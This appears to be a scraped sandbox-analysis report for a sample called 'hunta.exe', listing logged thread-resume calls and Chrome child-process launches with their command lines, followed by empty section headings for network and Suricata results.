NtGetContextThread Feb. 10, 2024, 2:39 p.m.	thread_handle: 0x000005c4	1	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x000001f8 suspend_count: 1 process_identifier: 192	1	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x0000022c suspend_count: 1 process_identifier: 192	1	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x0000023c suspend_count: 1 process_identifier: 192	1	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x00000754 suspend_count: 1 process_identifier: 192	1	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x0000020c suspend_count: 1 process_identifier: 2620	1	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x000001cc suspend_count: 1 process_identifier: 452	1	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x0000023c suspend_count: 1 process_identifier: 452	1	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x0000027c suspend_count: 1 process_identifier: 452	1	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x00000130 suspend_count: 1 process_identifier: 1332	1	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x000001b4 suspend_count: 1 process_identifier: 1332	1	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x00000214 suspend_count: 1 process_identifier: 3056	1	0
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 2112 thread_handle: 0x0000000000000098 process_identifier: 2116 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e9f1e8,0x7fef3e9f1f8,0x7fef3e9f208 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000000000009c	1	1
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 3108 thread_handle: 0x0000000000000144 process_identifier: 3104 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1632 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6 filepath_r: stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000148	1	1
NtResumeThread Feb. 10, 2024, 2:39 p.m.	thread_handle: 0x0000000000000210 suspend_count: 1 process_identifier: 3068	1	0
CreateProcessInternalW Feb. 10, 2024, 2:39 p.m.	thread_identifier: 2148 thread_handle: 0x0000000000000560 process_identifier: 3456 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1156,4585187372567679267,6574529224183986678,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=867986BF27614696DFD3BF5AFB20DF69 --mojo-platform-channel-handle=1172 --ignored=" --type=renderer " /prefetch:2 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 17302540 (CREATE_BREAKAWAY_FROM_JOB\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|DETACHED_PROCESS\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000594	1	1
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 2432 thread_handle: 0x0000000000000098 process_identifier: 2424 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e9f1e8,0x7fef3e9f1f8,0x7fef3e9f208 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000000000009c	1	1
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 3076 thread_handle: 0x0000000000000144 process_identifier: 1400 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1256 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6 filepath_r: stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000148	1	1
NtResumeThread Feb. 10, 2024, 2:39 p.m.	thread_handle: 0x0000000000000210 suspend_count: 1 process_identifier: 1892	1	0
CreateProcessInternalW Feb. 10, 2024, 2:39 p.m.	thread_identifier: 3752 thread_handle: 0x0000000000000644 process_identifier: 3812 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1124,4771041589543451130,17175966221262014770,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=A7779463E53D84E04E1E56AE4C57316B --mojo-platform-channel-handle=1164 --ignored=" --type=renderer " /prefetch:2 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 17302540 (CREATE_BREAKAWAY_FROM_JOB\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|DETACHED_PROCESS\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000614	1	1
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 1808 thread_handle: 0x0000000000000098 process_identifier: 936 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e9f1e8,0x7fef3e9f1f8,0x7fef3e9f208 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000000000009c	1	1
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 3188 thread_handle: 0x0000000000000144 process_identifier: 3184 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1616 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6 filepath_r: stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000148	1	1
NtResumeThread Feb. 10, 2024, 2:39 p.m.	thread_handle: 0x0000000000000210 suspend_count: 1 process_identifier: 1736	1	0

hunta.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All